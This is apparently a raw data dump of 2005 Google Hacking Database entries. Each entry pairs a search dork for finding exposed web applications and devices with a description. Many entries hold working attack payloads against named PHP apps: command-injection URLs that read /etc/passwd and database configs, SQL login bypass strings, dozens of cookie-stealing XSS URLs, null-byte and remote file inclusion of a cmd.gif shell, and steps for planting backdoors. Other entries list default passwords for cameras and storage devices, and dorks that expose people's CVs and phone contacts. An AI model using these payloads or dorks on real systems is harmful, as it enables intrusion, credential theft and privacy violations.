http://[target]/[path]/templates/TPL_GLOBAL.PHP?command=cat%20/etc/passwd to see /etc/passwd file http://[target]/[path]/templates/TPL_GLOBAL.PHP?command=cat%20/[path_to_config_file]/data.inc.php to see Mysql database password cross site scripting: same way, a user can hide evil javascript code in template", "submited": "2005-08-07", "request": "\"Powered by SilverNews\"", "id": 1052}, {"short description": "PHPFreeNews inurl:Admin.php", "long description": "29/07/2005 8.36.03PHPFreeNews Version 1.32 (&amp; previous) sql injection/login bypass, cross site scripting, path disclosure, information disclosure  author site: http://www.phpfreenews.co.uk/Main_Intro.phpxss poc:http://[target]/[path]/inc/Footer.php?ScriptVersion=alert(document.cookie)http://[target]/[path]/inc/ScriptFunctions.php?FullNewsDisplayMode=3&amp;NewsDir=\")}//--&gt;alert(document.cookie)http://[target]/[path]/inc/ScriptFunctions.php?EnableRatings=1&amp;NewsDir=\")}//--&gt;alert(document.cookie)http://[target]/[path]/inc/ScriptFunctions.php?EnableComments=1&amp;NewsDir=\")}//--&gt;alert(document.cookie)http://[target]/[path]/inc/ScriptFunctions.php?FullNewsDisplayMode=3&amp;PopupWidth=\")}//--&gt;alert(document.cookie)http://[target]/[path]/inc/ScriptFunctions.php?FullNewsDisplayMode=3&amp;PopupHeight=\")}//--&gt;alert(document.cookie)http://[target]/[path]/inc/ScriptFunctions.php?EnableComments=1&amp;PopupWidth=\")}//--&gt;alert(document.cookie)http://[target]/[path]/inc/ScriptFunctions.php?EnableComments=1&amp;PopupHeight=\")}//--&gt;alert(document.cookie)also a user can craft a url to redirect a victim to an evil site:http://[target]/[path]/inc/Logout.php?AdminScript=http://[evil_site]/[evil_script]path disclosure:http://[target]/[path]/inc/ArchiveOldNews.phphttp://[target]/[path]/inc/Categories.phphttp://[target]/[path]/inc/CheckLogout.phphttp://[target]/[path]/inc/CommentsApproval.phphttp://[target]/[path]/inc/Images.phphttp://[target]/[path]/inc/NewsList.phphttp://[target]/[path]/inc/Password.phphttp://[target]/[path]/inc/Post.phphttp://[target]/[path]/inc/PostsApproval.phphttp://[target]/[path]/inc/PurgeOldNews.phphttp://[target]/[path]/inc/SetSticky.phphttp://[target]/[path]/inc/SetVisible.phphttp://[target]/[path]/inc/Statistics.phphttp://[target]/[path]/inc/Template.phphttp://[target]/[path]/inc/UserDefinedCodes.phphttp://[target]/[path]/inc/Users.phpinformation disclosure:googledork:PHPFreeNews inurl:Admin.php(with this, you can passively fingerprint the server, PHP &amp; MySQL version are in Google description...because this info are shownwed with non-chalance in admin.php page ;) )default password:login: Adminpass: AdminMySQL Injection / Login Bypass in previous versions:login: Adminpassword: ') or isnull(1/0) or ('a'='anote: all string, not consider 'or'in 1.32 version LoginUsername and LoginPassword vars are addslashed... but, try this: login: whateverpass: //') or isnull(1/0) /* this is definetely patched in 1.40 version", "submited": "2005-08-07", "request": "PHPFreeNews inurl:Admin.php", "id": 1053}, {"short description": "inurl:nquser.php filetype:php", "long description": "Netquery 3.1 remote commands execution, cross site scripting, information disclosure poc exploit software: author site: http://www.virtech.org/tools/ a user can execute command on target system by PING panel, if enabled like often happens, using pipe char on input text \"Ping IP Address or Host Name\", example: | cat /etc/passwd then you will see plain text password file | pwd to see current path | rm [pwd_output]/logs/nq_log.txt to delete log file... disclosure of user activity: if enabled, a user can view clear text log file through url: http://[target]/[path]/logs/nq_log.txt xss: http://[target]/[path]/submit.php?portnum=\"/&gt;alert(document.cookie) http://[target]/[path]/nqgeoip2.php?step=alert(document.cookie) http://[target]/[path]/nqgeoip2.php?body=alert(document.cookie) http://[target]/[path]/nqgeoip.php?step=alert(document.cookie) http://[target]/[path]/nqports.php?step=alert(document.cookie) http://[target]/[path]/nqports2.php?step=alert(document.cookie) http://[target]/[path]/nqports2.php?body=alert(document.cookie) http://[target]/[path]/portlist.php?portnum=alert(document.cookie) a user can use on-line Netquery installations like proxy servers to launch exploit from HTTP GET request panel, example: exploiting Phpbb 2.0.15: make a get request of http://[vulnerable_server]/[path]/viewtopic.php?t=[existing_topic]&amp;highlight='.system($HTTP_GET_VARS[command].'&amp;command=cat%20/etc/passwd", "submited": "2005-08-07", "request": "inurl:nquser.php filetype:php", "id": 1054}, {"short description": "\"Powered By: Simplicity oF Upload\" inurl:download.php | inurl:upload.php", "long description": "26/07/2005 16.09.18Simplicity OF Upload 1.3 (possibly prior versons) remote code execution &amp; cross site scriptingsoftware: author site: http://www.phpsimplicity.com/scripts.php?id=3remote commands execution:problem at line 25-30: ...//check for language overriding..if (isset($_GET['language']))   $language = strtolower($_GET['language']);//now we include the language filerequire_once(\"$language.lng\");...you can include whatever adding a null byte to \"language\" parameter value:example:http://localhost:30/simply/download.php?language=upload.php%00you will see upload &amp; download page together :)so you can upload a cmd.gif (when you upload a .php file, usually it isrenamed to .html...)  file with this php code inside to executecommands:then try this url:http://[target]/[path]/download.php?language=cmd.gif%00&amp;command=lsto list directorieshttp://[target]/[path]/download.php?language=cmd.gif%00&amp;command=cat%20/etc/passwdto show /etc/passwd filecross site scripting:also, a remote user can supply a specially crafted URL to redirect other peopleto an evil page:http://[target]/[path]/download.php?language=http://[evil_site]/[evil_page]%00googledork:\"Powered By: Simplicity oF Upload\"", "submited": "2005-08-07", "request": "\"Powered By: Simplicity oF Upload\" inurl:download.php | inurl:upload.php", "id": 1055}, {"short description": "\"Powered by FlexPHPNews\" inurl:news | inurl:press", "long description": "24/07/2005 2.38.13Flex PHPNews 0.0.4 login bypass/ sql injection, cross site scripting &amp; resource consumption poc exploitsoftware:author site:http://www.china-on-site.com/flexphpnews/downloads.phpxss / cookie disclosure:http://[target]/[path]/index.php?front_indextitle=alert(document.cookie)http://[target]/[path]/index.php?front_searchsubmit=\"&gt;alert(document.cookie)http://[target]/[path]/index.php?front_latestnews=\"&gt;alert(document.cookie)http://[target]/[path]/news.php?newsid=\"&gt;alert(document.cookie)http://[target]/[path]/news.php?front_rating=\"&gt;alert(document.cookie)http://[target]/[path]/news.php?salt=\"&gt;alert(document.cookie)http://[target]/[path]/news.php?front_letmerateit=\"&gt;alert(document.cookie)http://[target]/[path]/news.php?front_ratebest=\"&gt;alert(document.cookie)http://[target]/[path]/news.php?front_ratesubmit=\"&gt;alert(document.cookie)http://[target]/[path]/news.php?front_searchsubmit=\"&gt;alert(document.cookie)http://[target]/[path]/search.php?front_searchresult=alert(document.cookie)http://[target]/[path]/search.php?front_searchsubmit=\"&gt;alert(document.cookie)http://[target]/[path]/catalog.php?front_searchsubmit=\"&gt;alert(document.cookie)http://[target]/[path]/catalog.php?front_latestnews=\"&gt;alert(document.cookie)http://[target]/[path]/catalog.php?catalogid=\"&gt;alert(document.cookie)path disclosure:http://[target]/[path]/admin/usercheck.php?logincheck=%00denial of service / resources consumption:http://[target]/[path]/news.php?prenumber=99999999999999999999999999999999http://[target]/[path]/news.php?nextnumber=99999999999999999999999999999999($prenumber and $nextnumber are uninitialized final values of a loop...) sql injection / bypass authentication:go to login page:http://[target]/[path]/admin/(usually admin if not changed)login as user:   ' OR 'a'='aand pass     :   ' OR 'a'='a           boom! you're admin ...the problem is in usercheck.php at line 5:$sql = \"select username from newsadmin where username='$checkuser' and password='$checkpass'\";you can post always true statements, like 'a'='a'solution: replace $checkuser and $checkpass vars with your username and pass, by the moment", "submited": "2005-08-07", "request": "\"Powered by FlexPHPNews\" inurl:news | inurl:press", "id": 1056}, {"short description": "\"Powered by FunkBoard\"", "long description": "FunkBoard V0.66CF (possibly prior versions) cross site scripting, possible database username/password disclosure &amp; board takeover, possible remote code execution software: author site: http://www.[path_to_funkboard].co.uk/ xss: http://[target]/[path_to_funkboard]/editpost.php?fbusername=\"&gt;alert(document.cookie) http://[target]/[path_to_funkboard]/editpost.php?fbpassword=\"&gt;alert(document.cookie) http://[target]/[path_to_funkboard]/prefs.php?fbpassword=\"&gt;alert(document.cookie) http://[target]/[path_to_funkboard]/prefs.php?fbusername=\"&gt;alert(document.cookie) http://[target]/[path_to_funkboard]/newtopic.php?forumid=1&amp;fbusername=\"&gt;alert(document.cookie) http://[target]/[path_to_funkboard]/newtopic.php?forumid=1&amp;fbpassword=\"&gt;alert(document.cookie) http://[target]/[path_to_funkboard]/newtopic.php?forumid=1&amp;subject=\"&gt;alert(document.cookie) http://[target]/[path_to_funkboard]/reply.php?forumid=1&amp;threadid=1&amp;fbusername=\"&gt;alert(document.cookie) http://[target]/[path_to_funkboard]/reply.php?forumid=1&amp;threadid=1&amp;fbpassword=\"&gt;alert(document.cookie) http://[target]/[path_to_funkboard]/profile.php?fbusername=\"&gt;alert(document.cookie) http://[target]/[path_to_funkboard]/profile.php?fbpassword=\"&gt;alert(document.cookie) http://[target]/[path_to_funkboard]/register.php?fbusername=\"&gt;alert(document.cookie) http://[target]/[path_to_funkboard]/register.php?fmail=\"&gt;alert(document.cookie) http://[target]/[path_to_funkboard]/register.php?www=\"&gt;alert(document.cookie) http://[target]/[path_to_funkboard]/register.php?icq=\"&gt;alert(document.cookie) http://[target]/[path_to_funkboard]/register.php?yim=\"&gt;alert(document.cookie) http://[target]/[path_to_funkboard]/register.php?location=\"&gt;alert(document.cookie) http://[target]/[path_to_funkboard]/register.php?sex=\"&gt;alert(document.cookie) http://[target]/[path_to_funkboard]/register.php?interebbies=\"&gt;alert(document.cookie) http://[target]/[path_to_funkboard]/register.php?sig=alert(document.cookie) http://[target]/[path_to_funkboard]/register.php?aim=\"&gt;alert(document.cookie) path disclosure: http://[target]/[path_to_funkboard]/images/forums.php database username &amp; password disclosure: during installation is not remembered to delete the mysql_install script and the installation do not delete it, usually: http://[target]/[path]/admin/mysql_install.php or http://[target]/[path]/admin/pg_install.php there, a user can see database clear text username &amp; password ... Then, the script let the user proceed to the next page, where he can reset funkboard administator username &amp; password. Now the script faults, because some tables exist, etc. So  user can go back and setting a new database name for installation, guessing among other installations on the server... Once Installation succeeded he can set new admin username e password then login at this page: http://[target]/[path]/[path_to_funkboard]/admin/index.php Now the user can edit templates and append some evil javascript code. remote code execution: look at this code in mysql_install.php : $infoout = \" so, you have a backdoor on target system... you can launch commands by this urls: http://localhost:30/funkboard/info.php?command=ls%20-la to list directories... http://localhost:30/funkboard/info.php?command=cat%20/etc/passwd to see /etc/passwd file", "submited": "2005-08-08", "request": "\"Powered by FunkBoard\"", "id": 1057}, {"short description": "\"Summary View of Sensors\" | \"sensorProbe8 v *\" | \"cameraProbe 3.0\" -filetype:pdf -filetype:html", "long description": "sensorProbe is a SNMP enabled and Web based Environmental Monitoring Device. The sensors attached to this device can monitor temperature, humidity, water leakage and air flow, etc. It does support other sensors which can monitor voltage drop, security, analog and dry contacts. The sensorProbe monitors your equipment's environmental variations, and alerts you through \"Email , SMS or SNMP Alerts in your Network Management system\" in advance and prevent any disaster.", "submited": "2005-08-07", "request": "\"Summary View of Sensors\" | \"sensorProbe8 v *\" | \"", "id": 1058}, {"short description": "intitle:\"Cisco CallManager User Options Log On\" \"Please enter your User ID and Password in the spaces provided below and click the Log On button to co", "long description": "[quote]Cisco CallManagerCallManager is a FREE web application/interface included with your VoIP telephone service. It allows you to change and update settings on your phone without having to contact the Telecommunications Help Desk.Voice over IP telephone users Logon to Cisco CallManager at: http://XXXXXX/ccmuser/logon.asp* User ID  your UWYO Domain username* Password initial password is 12341234Please create your own unique password after your initial logon[/quote]There are several vulnerbilities for CallManager", "submited": "2005-08-08", "request": "intitle:\"Cisco CallManager User Options Log On\" \"Please enter your User ID and Password in the spaces provided below and click the Log On button to co", "id": 1059}, {"short description": "inurl:index.php fees shop link.codes merchantAccount", "long description": "Vulnerability in EPay systemsPHP code includinghttp://targeturl/index.php?read=../../../../../../../../../../../../../../etc/passwdadvisory:http://www.cyberlords.net/advisories/cl_epay.txtEPay Pro version 2.0 is vulnerable to this issue.", "submited": "2005-08-10", "request": "inurl:index.php fees shop link.codes merchantAccount", "id": 1060}, {"short description": "intitle:\"admin panel\" +\"Powered by RedKernel\"", "long description": "This finds all versions of RedKernel Referer Tracker(stats page) it just gives out some nice info", "submited": "2005-08-16", "request": "intitle:\"admin panel\" +\"Powered by RedKernel\"", "id": 1061}, {"short description": "intitle:phpnews.login", "long description": "Vulnerable script auth.php (SQL injection)--- from rst.void.ru ---Possible scenario of attack:[1] log in admin panel, using SQL injection[2] upload PHP file through \"Upload Images\" function (index.php?action=images) and have fun with php shellor edit template (index.php?action=modtemp) and put backdoor code into it.-------------------------http://www.securityfocus.com/bid/14333/infohttp://rst.void.ru/papers/advisory31.txtThe version number may be found sometimes in error messages.", "submited": "2005-08-10", "request": "intitle:phpnews.login", "id": 1062}, {"short description": "intitle:\"blog torrent upload\"", "long description": "Blog Torrent is free, open-source software that provides a way to share large files on your website.vulnerability: free access to the password filehttp://[target]/[path_of_blog]/data/newusersadvisory:http://www.securitytracker.com/alerts/2005/Jul/1014449.htmlAll current versions could be vulnerable depending on directory permissions.", "submited": "2005-08-10", "request": "intitle:\"blog torrent upload\"", "id": 1063}, {"short description": "intitle:MyShell 1.1.0 build 20010923", "long description": "Basicly MyShell is a php program that allows you to execute commands remotely on whichever server it's hosted on.", "submited": "2005-08-15", "request": "intitle:MyShell 1.1.0 build 20010923", "id": 1064}, {"short description": "intitle:\"Network Storage Link for USB 2.0 Disks\" Firmware", "long description": "Networked USB hard drives (NSLU2).  Be sure to disable Google's filter (&amp;filters=0) as that is where they pop up. Default password (Linksys) is admin:admin (just like all the rest).  A majority are locked some are not.  Some logins to the NSLU2 will be a link off a website. Enjoy.", "submited": "2005-08-12", "request": "http://www.google.com/search?q=intitle:%22Network+Storage+Link+for+USB+2.0+Disks%22+Firmware&amp;num=100&amp;hl=en&amp;lr=&amp;c2coff=1&amp;safe=off&amp;filter=0", "id": 1065}, {"short description": "intitle:\"AlternC Desktop\"", "long description": "This finds the login page for AlternC Desktop I dont know what versions.", "submited": "2005-08-15", "request": "intitle:\"AlternC Desktop\"", "id": 1066}, {"short description": "intitle:\"communigate pro * *\" intitle:\"entrance\"", "long description": "Just reveals the login for Communigate Pro webmail. A brute force attack could be attempted. The directory link from this page can in some instances be used to query user information.", "submited": "2005-08-11", "request": "intitle:communigate pro entrance", "id": 1067}, {"short description": "\"inspanel\" intitle:\"login\" -\"cannot\" \"Login ID\" -site:inspediumsoft.com", "long description": "This finds all versions of the inspanel login page.", "submited": "2005-08-15", "request": "\"inspanel\" intitle:\"login\" -\"cannot\" \"Login ID\" -site:inspediumsoft.com", "id": 1068}, {"short description": "intitle:iDVR -intitle:\"com | net | shop\" -inurl:\"asp | htm | pdf | html | php | shtml | com | at | cgi | tv\"", "long description": "Online camera. Default login is administrator and password blank. Video server runs default on port 2000. There is an application DVR Center that is used to connect to server and manage recorded videos.", "submited": "2005-08-17", "request": "intitle:iDVR -intitle:\"com | net | shop\" -inurl:\"asp | htm | pdf | html | php | shtml | com | at | cgi | tv\"", "id": 1069}, {"short description": "\"HostingAccelerator\" intitle:\"login\" +\"Username\" -\"news\" -demo", "long description": "This will find the login portal for HostingAccelerator ControlPanel I have not looked for exploits for these so i dont know if their are any. So far i have seen versions 1.9 2.2 and 2.4 found by this dork.", "submited": "2005-08-14", "request": "\"HostingAccelerator\" intitle:\"login\" +\"Username\" -\"news\" -demo", "id": 1070}, {"short description": "intitle:\"INTELLINET\" intitle:\"IP Camera Homepage\"", "long description": "This googledork finds INTELLINET ip cameras.  They are used to monitor things and have a web interface.  Most of the pages load with the default username and password of guest.  The user manual says that the default admin username/password is admin/admin.  At the time of posting this googledork had 10 results.     p.s. This was discovered by jeffball55 and cleaned up by golfo", "submited": "2005-08-27", "request": "intitle:\"INTELLINET\" intitle:\"IP Camera Homepage\"", "id": 1071}, {"short description": "\"Powered by Zorum 3.5\"", "long description": "Zorum 3.5 remote code execution poc exploitsoftware:description: Zorum is a freely available, open source Web-based forumapplication implemented in PHP. It is available for UNIX, Linux, and any otherplatform that supports PHP script execution.author site: http://zorum.phpoutsourcing.com/1) remote code execution:vulnerable code, in /gorum/prod.php file:07  $doubleApp = isset($argv[1]);    ...14   if( $doubleApp )15   {16      $appDir = $argv[1];17      system(\"mkdir $prodDir/$appDir\");   ...a user can execute arbitrary commands using pipe char, example:http://[target]/zorum/gorum/prod.php?argv[1]=|ls%20-lato list directorieshttp://[target]/zorum/gorum/prod.php?argv[1]=|cat%20../config.phpto see database username/password...http://[target]/zorum/gorum/prod.php?argv[1]=|cat%20/etc/passwdto see /etc/passwd file2) path disclosure:http://[target]/zorum/gorum/notification.phphttp://[target]/zorum/user.phphttp://[target]/zorum/attach.phphttp://[target]/zorum/blacklist.phphttp://[target]/zorum/forum.phphttp://[target]/zorum/globalstat.phphttp://[target]/zorum/gorum/trace.phphttp://[target]/zorum/gorum/badwords.phphttp://[target]/zorum/gorum/flood.phpand so on...googledork:\"Powered by Zorum 3.5\"rgodsite: http://rgod.altervista.orgmail: retrogod at aliceposta itoriginal advisory: http://rgod.altervista.org/zorum.html", "submited": "2005-08-18", "request": "\"Powered by Zorum 3.5\"", "id": 1072}, {"short description": "intitle:\"xams 0.0.0..15 - Login\"", "long description": "This is the login for xams it should catch from 0.0.1-0.0.150.0.15 being the latest version as far as I can see their is only versions 0.0.13 0.0.14 and 0.0.15", "submited": "2005-08-14", "request": "intitle:\"xams 0.0.0..15 - Login\"", "id": 1073}, {"short description": "intitle:\"curriculum vitae\" filetype:doc", "long description": "Hello. 1. It reveals personal datas, often private addresses, phone numbers, e-mails, how many children one has:). Full curriculum vitae. I tried many verions of it:inurl:\"pl\" intitle:\"curriculum vitae\" filetype:docinurl:\"uk\" intitle:\"curriculum vitae\" filetype:docinurl:\"nl\" intitle:\"curriculum vitae\" filetype:doc, etc. in order to get national results,alsointitle:\"curriculum vitae\" ext:(doc | rtf )However filetype:doc version gives the most results. 2. You can always do someting with someone phone number, date and place of birth, etc. I placed this string in the forum, but nobody answered me :(. GreetingsphilYps. you have something similar in your GHDB, but different.\"Click here for the Google search ==&gt; \"phone * * *\" \"address *\" \"e-mail\" intitle:\"curriculum vitae\"(opens in new window)Added: Thursday, August 19, 2004hits: 24771\"", "submited": "2005-08-12", "request": "intitle:\"curriculum vitae\" filetype:doc", "id": 1074}, {"short description": "\"There seems to have been a problem with the\" \" Please try again by clicking the Refresh button in your web browser.\"", "long description": "search reveals database errors on vbulletin sites. View the page source and you can get information about the sql query executed, this can help in all manner of ways depending on the query.", "submited": "2005-08-16", "request": "\"There seems to have been a problem with the\" \" Please try again by clicking the Refresh button in your web browser.\"", "id": 1075}, {"short description": "inurl:csCreatePro.cgi", "long description": "Create Pro logon pages.", "submited": "2005-08-28", "request": "inurl:csCreatePro.cgi", "id": 1076}, {"short description": "\"Powered by FUDForum 2.6\" -site:fudforum.org -johnny.ihackstuff", "long description": "FUDforum is prone to a remote arbitrary PHP file upload vulnerability.An attacker can merge an image file with a script file and upload it to an affected server.This issue can facilitate unauthorized remote access.FUDforum versions prior to 2.7.1 are reported to be affected. Currently Symantec cannot confirm if version 2.7.1 is affected as well.Affected versions:2.6.15 _ 2.6.14 _ 2.6.132.6.12 _ 2.6.10 _ 2.6.9 _ 2.6.82.6.7 _ 2.6.5 _ 2.6.4 _ 2.6.32.6.2 _ 2.6.1 _ 2.6", "submited": "2005-08-30", "request": "\"Powered by FUDForum 2.6\" -site:fudforum.org -johnny.ihackstuff", "id": 1077}, {"short description": "intitle:\"Looking Glass v20040427\" \"When verifying an URL check one of those\"", "long description": "Looking Glass v20040427 arbitrary commands execution / cross site scripting. description: Looking Glass is a pretty extensive web based network querying tool for use on php enabled servers.  site: http://de-neef.net/articles.php?id=2&amp;page=1download page: http://de-neef.net/download.php?file=2Read the full report here: http://rgod.altervista.org/lookingglass.html", "submited": "2005-09-19", "request": "intitle:\"Looking Glass v20040427\" \"When verifying", "id": 1078}, {"short description": "contacts ext:wml", "long description": "Forget Bluetooth Hacking! You'll be amazed, at how many people sync their Cell Phones to the same Computers they run some type of Server on. This Query literally gives you access to peoples private contact lists that are ether on there  Smart Phones', or on their Windows CE wireless devices.An attacker could Spoof Emails with the \"SIG\" details of the persons Phone firmware, or simply collect the cellular numbers for something later on down the road.I even hypotheticlly came across some private text messages!", "submited": "2005-08-23", "request": "contacts ext:wml", "id": 1079}, {"short description": "intitle:\"NetCam Live Image\" -.edu -.gov -johnny.ihackstuff.com", "long description": "This is a googledork for StarDot netcams.  You can watch these cams and if you have the admin password you can change configurations and other settings.  They have a default admin name/pass but I haven't taken the time to figure it out.", "submited": "2005-09-06", "request": "intitle:\"NetCam Live Image\" -.edu -.gov -johnny.ihackstuff.com", "id": 1080}, {"short description": "intitle:\"Content Management System\" \"user name\"|\"password\"|\"admin\" \"Microsoft IE 5.5\" -mambo -johnny.ihackstuff", "long description": "iCMS - Content Management System...Create websites without knowing HTML or web programming.", "submited": "2005-08-30", "request": "intitle:\"Content Management System\" \"user name\"|\"password\"|\"admin\" \"Microsoft IE 5.5\" -mambo -johnny.ihackstuff", "id": 1081}, {"short description": "phpLDAPadmin intitle:phpLDAPadmin filetype:php inurl:tree.php | inurl:login.php | inurl:donate.php (0.9.6 | 0.9.7)", "long description": "phpLDAPadmin 0.9.6 - 0.9.7/alpha5 (possibly prior versions) system disclosure,remote code execution, cross site scriptingsoftware:author site: http://phpldapadmin.sourceforge.net/description: phpLDAPadmin is a web-based LDAP client. It provides easy,anywhere-accessible, multi-language administration for your LDAP serverIf unpatched and vulnerable, a user can see any file on target system. A user can also execute arbitrary php code and system commands or craft a malicious url to include malicious client side code that will be executed in the security contest of the victim browser.", "submited": "2005-08-29", "request": "phpLDAPadmin intitle:phpLDAPadmin filetype:php inurl:tree.php | inurl:login.php | inurl:donate.php (0.9.6 | 0.9.7)", "id": 1082}, {"short description": "\"powered by ITWorking\"", "long description": "saveWebPortal 3.4 remote code execution / admin check bypass / remote fileinclusion / cross site scripting author site: http://www.circeos.itdownload page: http://www.circeos.it/frontend/index.php?page=downloadsa) remote code execution:a user can bypass admin check, calling this url:http://[target]/saveweb/admin/PhpMyExplorer/editerfichier.php?chemin=.&amp;fichier=header.php&amp;type=Sourcenow can leave a backdoor in header.php or some other file, example:after editing template, user can execute arbitrary system commands, through aurl like this:http://[target]/saveweb/header.php?command=ls%20-lato list directories...http://[target]/saveweb/header.php?command=cat%20config.inc.phpto see database username/password and admin panel username/password (now attacker have full access to site configuration... can go tohttp://[target]/saveweb/admin/to login...)http://[target]/saveweb/header.php?command=cat%20/etc/passwdto see passwd file...b) arbitrary file inclusion:a user can view any file on the target server,if not with .php extension:http://[target]/saveweb/menu_dx.php?SITE_Path=../../../../../boot.ini%00http://[target]/saveweb/menu_sx.php?CONTENTS_Dir=../../../../../boot.ini%00can execute arbitrary file resident on target server, if with .php extension,example :http://[target]/saveweb/menu_dx.php?SITE_Path=../../../../../[script].php%00http://[target]/saveweb/menu_sx.php?CONTENTS_Dir=../../../../../[script].php%00can craft a malicious url to cause victim user to execute commands on externalsite:http://[target]/saveweb/menu_dx.php?SITE_Path=http://[external_site]/cmd.gif%00http://[target]/saveweb/menu_sx.php?CONTENTS_Dir=http://[external_site]/cmd.gif%00where cmd.gif is a file like this:c) xss:c.1)http://[target]/saveweb/footer.php?TABLE_Width=&gt;alert(document.cookie)http://[target]/saveweb/footer.php?SITE_Author_Domain=&gt;alert(document.cookie)http://[target]/saveweb/footer.php?SITE_Author=&gt;alert(document.cookie)http://[target]/saveweb/footer.php?L_Info=&gt;alert(document.cookie)http://[target]/saveweb/footer.php?L_Help=&gt;alert(document.cookie)http://[target]/saveweb/header.php?TABLE_Width=&gt;alert(document.cookie)http://[target]/saveweb/header.php?L_Visitors=&gt;alert(document.cookie)http://[target]/saveweb/header.php?count=&gt;alert(document.cookie)http://[target]/saveweb/header.php?SITE_Logo=\"&gt;alert(document.cookie)http://[target]/saveweb/header.php?BANNER_Url=\"&gt;alert(document.cookie)http://[target]/saveweb/header.php?L_Sunday=\"}alert(document.cookie)", "submited": "2005-08-21", "request": "\"powered by ITWorking\"", "id": 1083}, {"short description": "intitle:guestbook inurl:guestbook \"powered by Advanced guestbook 2.*\" \"Sign the Guestbook\"", "long description": "Advanced Guestbook is prone to an HTML injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in dynamically generated content.Attacker-supplied HTML and script code would be executed in the context of the affected Web site, potentially allowing for theft of cookie-based authentication credentials. An attacker could also exploit this issue to control how the site is rendered to the user; other attacks are also possible.", "submited": "2005-08-30", "request": "intitle:guestbook inurl:guestbook \"powered by Adva", "id": 1084}, {"short description": "intext:\"Master Account\" \"Domain Name\" \"Password\" inurl:/cgi-bin/qmailadmin", "long description": "qmail mail admin login pages.There are several vulnerabilities relating to this software", "submited": "2005-08-30", "request": "intext:\"Master Account\" \"Domain Name\" \"Password\" inurl:/cgi-bin/qmailadmin", "id": 1085}, {"short description": "intitle:\"web-cyradm\"|\"by Luc de Louw\" \"This is only for authorized users\" -tar.gz -site:web-cyradm.org -johnny.ihackstuff", "long description": "Web-cyradm is a software that glues topnotch mailing technologies together. The focus is on administrating small and large mailing environments.Web-cyradm is used by many different users. At the low end this are homeusers which are providing mailadresses to their family. On the mid to top end users are SME enterprises, educational and other organizations.The software on which web-cyradm relies on is completely free and opensource software. So you get the maximung flexibility which the lowest TCO.", "submited": "2005-08-30", "request": "intitle:\"web-cyradm\"|\"by Luc de Louw\" \"This is only for authorized users\" -tar.gz -site:web-cyradm.org -johnny.ihackstuff", "id": 1086}, {"short description": "\"Powered by FUDForum 2.7\" -site:fudforum.org -johnny.ihackstuff", "long description": "FUDforum is prone to a remote arbitrary PHP file upload vulnerability.An attacker can merge an image file with a script file and upload it to an affected server.This issue can facilitate unauthorized remote access.FUDforum versions prior to 2.7.1 are reported to be affected. Currently Symantec cannot confirm if version 2.7.1 is affected as well.Affected versions:2.7", "submited": "2005-08-30", "request": "\"Powered by FUDForum 2.7\" -site:fudforum.org -johnny.ihackstuff", "id": 1087}, {"short description": "\"You have requested to access the management functions\"  -.edu", "long description": "Terracotta web manager admin login portal.", "submited": "2005-08-30", "request": "\"You have requested to access the management functions\"  -.edu", "id": 1088}, {"short description": "\"Please authenticate yourself to get access to the management interface\"", "long description": "Photo gallery managment system login", "submited": "2005-08-30", "request": "\"Please authenticate yourself to get access to the management interface\"", "id": 1089}, {"short description": "ext:inc \"pwd=\" \"UID=\"", "long description": "Database connection strings including passwords", "submited": "2005-08-31", "request": "ext:inc \"pwd=\" \"UID=\"", "id": 1090}, {"short description": "inurl:chitchat.php \"choose graphic\"", "long description": "rgod advises:Cyber-Cats ChitCHat 2.0 permit cross site scripting attacks, let users launch exploits from, let remote users obtain informations on target users, let insecurely delete/create files. This search does not find vulnerable versions, only generic.software:site: http://www.cyber-cats.com/php/rgodsite: http://rgod.altervista.orgmail: retrogod@aliceposta.it[/code]", "submited": "2005-09-04", "request": "inurl:chitchat.php \"choose graphic\"", "id": 1091}, {"short description": "\"Calendar programming by AppIdeas.com\" filetype:php", "long description": "phpCommunityCalendar 4.0.3 (possibly prior versions) sql injection / login bypass / cross site scripting This search does not narrow to vulnerable versions.software:site: http://open.appideas.comdownload: http://open.appideas.com/Calendar/original advisory: http://rgod.altervista.org/phpccal.html", "submited": "2005-09-05", "request": "\"Calendar programming by AppIdeas.com\" filetype:php", "id": 1092}, {"short description": "\"Powered by MD-Pro\" | \"made with MD-Pro\"", "long description": "MAXdev MD-Pro 1.0.73 (possibly prior versions) remote code execution/ cross site scripting / path disclosure. This search does not find vulnerable versions.software:site: http://www.maxdev.com/description: http://www.maxdev.com/AboutMD.phtmloriginal advisory: http://rgod.altervista.org/maxdev1073.html", "submited": "2005-09-05", "request": "\"Powered by MD-Pro\" | \"made with MD-Pro\"", "id": 1093}, {"short description": "\"Software PBLang\" 4.65 filetype:php", "long description": "my advisory:[quote]PBLang 4.65 (possibly prior versions) remote code execution / administrativecredentials disclosure / system information disclosure / cross site scripting /path disclosuresoftware:description: PBLang is a powerful flatfile Bulletin Board System. It combinesmany features of a professional board, but does not even require SQL support. Itis completely based on text-file.site: http://pblang.drmartinus.de/download: https://sourceforge.net/project/showfiles.php?group_id=629531) system disclosure:you can traverse directories and see any file (if not .php or .php3 etc.) andinclude any file on target system using '../' chars and null byte (%00), example:http://target]/[path]/pblang/setcookie.php?u=../../../../../etc/passwd%00vulnerable code in setcookie.php:   ...16 $usrname=$HTTP_GET_VARS['u'];17 @include($dbpath.'/'.$usrname.'temp');   ...2) remote code execution:board stores data in files, when you register a [username] file without extensionis created in /db/members directory, inside we have php code executed when youlogin, so in location field type:madrid\"; system($HTTP_POST_VARS[cmd]); echo \"in /db/members/[username] file we have...$userlocation=\"madrid\"; system($HTTP_GET_VARS[cmd]); echo \"\";...no way to access the script directly, /db/members is .htaccess protectedand extra lines are deleted from files after you login, so you should makeall in a POST request and re-registerthis is my proof of concept exploit, to include [username] file I make a GET request of setcookie.php?u=[username]%00&amp;cmd=[command] but you can call username file through some other inclusion surely when you surf the forum:http://rgod.altervista.org/pblang465.html 3)admin/user credentials disclosure:you can see password hash of any user or admin sending the command:cat ./db/members/[username]4) cross site scripting:register and in location field type:madrid\"; echo \"alert(document.cookie)then check this url:http://[target]/[path]/setcookie.php?u=[username]%005) path disclosure:http://[target]/[path]/setcookie.php?u=%00googledork: \"Software PBLang\" filetype:phprgodsite: http://rgod.altervista.orgmail: retrogod@aliceposta.itoriginal advisory: http://rgod.altervista.org/pblang465.html[/quote]", "submited": "2005-09-07", "request": "\"Software PBLang\" 4.65 filetype:php", "id": 1094}, {"short description": "\"Powered by and copyright class-1\"  0.24.4", "long description": "class-1 Forum Software v 0.24.4 Remote code executionsoftware: site: http://www.class1web.co.uk/softwaredescription: class-1 Forum Software is a PHP/MySQL driven web forum. It is written and distributedunder the GNU General Public License which means that its source is freely-distributedand available to the general public. vulnerability: the 